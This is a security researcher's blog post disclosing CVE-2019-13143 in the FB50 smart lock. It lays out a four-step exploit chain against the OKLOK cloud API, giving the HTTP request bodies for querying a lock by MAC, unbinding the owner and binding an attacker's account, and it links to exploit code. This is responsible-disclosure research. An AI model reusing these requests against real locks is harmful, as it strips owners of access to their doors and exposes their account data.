pages/blog/fb50.md (view raw)
1---
2template: text.html
3title: Picking the FB50 smart lock (CVE-2019-13143)
4subtitle: … and lessons learnt in IoT security
5date: 2019-08-05
6---
7
8# Picking the FB50 smart lock (CVE-2019-13143)
9## … and lessons learnt in IoT security
10
11(*originally posted at [SecureLayer7's Blog](http://blog.securelayer7.net/fb50-smart-lock-vulnerability-disclosure), with my edits*)
12
13### The lock
14
15The lock in question is the FB50 smart lock, manufactured by Shenzhen
16Dragon Brother Technology Co. Ltd. This lock is sold under multiple brands
17across many ecommerce sites, and has over, an estimated, 15k+ users.
18
19The lock pairs to a phone via Bluetooth, and requires the OKLOK app from
20the Play/App Store to function. The app requires the user to create an
21account before further functionality is available.
22It also facilitates configuring the fingerprint,
23and unlocking from a range via Bluetooth.
24
25We had two primary attack surfaces we decided to tackle — Bluetooth (BLE)
26and the Android app.
27
28### Via Bluetooth Low Energy (BLE)
29
30Android phones have the ability to capture Bluetooth (HCI) traffic
31which can be enabled under Developer Options under Settings. We made
32around 4 "unlocks" from the Android phone, as seen in the screenshot.
33
34
35
36This is the value sent in the `Write` request:
37
38
39
40We attempted replaying these requests using `gattool` and `gattacker`,
41but that didn't pan out, since the value being written was encrypted.[^1]
42
43### Via the Android app
44
45Reversing the app using `jd-gui`, `apktool` and `dex2jar` didn't get us too
46far since most of it was obfuscated. Why bother when there exists an
47easier approach -- BurpSuite.
48
49We captured and played around with a bunch of requests and responses,
50and finally arrived at a working exploit chain.
51
52### The exploit
53
54The entire exploit is a 4 step process consisting of authenticated
55HTTP requests:
56
571. Using the lock's MAC (obtained via a simple Bluetooth scan in the
58vicinity), get the barcode and lock ID
592. Using the barcode, fetch the user ID
603. Using the lock ID and user ID, unbind the user from the lock
614. Provide a new name, attacker's user ID and the MAC to bind the attacker
62to the lock
63
64This is what it looks like, in essence (personal info redacted).
65
66#### Request 1
67
68```
69POST /oklock/lock/queryDevice
70{"mac":"XX:XX:XX:XX:XX:XX"}
71```
72
73Response:
74
75```
76{
77 "result":{
78 "alarm":0,
79 "barcode":"<BARCODE>",
80 "chipType":"1",
81 "createAt":"2019-05-14 09:32:23.0",
82 "deviceId":"",
83 "electricity":"95",
84 "firmwareVersion":"2.3",
85 "gsmVersion":"",
86 "id":<LOCK ID>,
87 "isLock":0,
88 "lockKey":"69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95",
89 "lockPwd":"000000",
90 "mac":"XX:XX:XX:XX:XX:XX",
91 "name":"lock",
92 "radioName":"BlueFPL",
93 "type":0
94 },
95 "status":"2000"
96}
97```
98
99#### Request 2
100
101```
102POST /oklock/lock/getDeviceInfo
103
104{"barcode":"https://app.oklok.com.cn/app.html?id=<BARCODE>"}
105```
106
107Response:
108
109```
110 "result":{
111 "account":"email@some.website",
112 "alarm":0,
113 "barcode":"<BARCODE>",
114 "chipType":"1",
115 "createAt":"2019-05-14 09:32:23.0",
116 "deviceId":"",
117 "electricity":"95",
118 "firmwareVersion":"2.3",
119 "gsmVersion":"",
120 "id":<LOCK ID>,
121 "isLock":0,
122 "lockKey":"69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95",
123 "lockPwd":"000000",
124 "mac":"XX:XX:XX:XX:XX:XX",
125 "name":"lock",
126 "radioName":"BlueFPL",
127 "type":0,
128 "userId":<USER ID>
129 }
130```
131
132#### Request 3
133
134```
135POST /oklock/lock/unbind
136
137{"lockId":"<LOCK ID>","userId":<USER ID>}
138```
139#### Request 4
140
141```
142POST /oklock/lock/bind
143
144{"name":"newname","userId":<USER ID>,"mac":"XX:XX:XX:XX:XX:XX"}
145```
146
147### That's it! (& the scary stuff)
148
149You should have the lock transferred to your account. The severity of this
150issue lies in the fact that the original owner completely loses access to
151their lock. They can't even "rebind" to get it back, since the current owner
152(the attacker) needs to authorize that.
153
154To add to that, roughly 15,000 user accounts' info are exposed via IDOR.
155Ilja, a cool dude I met on Telegram, noticed locks named "carlock",
156"garage", "MainDoor", etc.[^2] This is terrifying.
157
158*shudders*
159
160### Proof of Concept
161
162[PoC Video](https://twitter.com/icyphox/status/1158396372778807296)
163
164[Exploit code](https://github.com/icyphox/pwnfb50)
165
166### Disclosure timeline
167
168- **26th June, 2019**: Issue discovered at SecureLayer7, Pune
169- **27th June, 2019**: Vendor notified about the issue
170- **2nd July, 2019**: CVE-2019-13143 reserved
171- No response from vendor
172- **2nd August 2019**: Public disclosure
173
174### Lessons learnt
175
176**DO NOT**. Ever. Buy. A smart lock. You're better off with the "dumb" ones
177with keys. With the IoT plague spreading, it brings in a large attack surface
178to things that were otherwise "unhackable" (try hacking a "dumb" toaster).
179
180The IoT security scene is rife with bugs from over 10 years ago, like
181executable stack segments[^3], hardcoded keys, and poor development
182practices in general.
183
184Our existing threat models and scenarios have to be updated to factor
185in these new exploitation possibilities. This also broadens the playing
186field for cyber warfare and mass surveillance campaigns.
187
188### Researcher info
189
190This research was done at [SecureLayer7](https://securelayer7.net), Pune, IN by:
191
192* Anirudh Oppiliappan (me)
193* S. Raghav Pillai ([@_vologue](https://twitter.com/_vologue))
194* Shubham Chougule ([@shubhamtc](https://twitter.com/shubhamtc))
195
196[^1]: [This](https://www.pentestpartners.com/security-blog/pwning-the-nokelock-api/) article discusses a similar smart lock, but they broke the encryption.
197[^2]: Thanks to Ilja Shaposhnikov (@drakylar).
198[^3]: [PDF](https://gsec.hitb.org/materials/sg2015/whitepapers/Lyon%20Yang%20-%20Advanced%20SOHO%20Router%20Exploitation.pdf)
199
200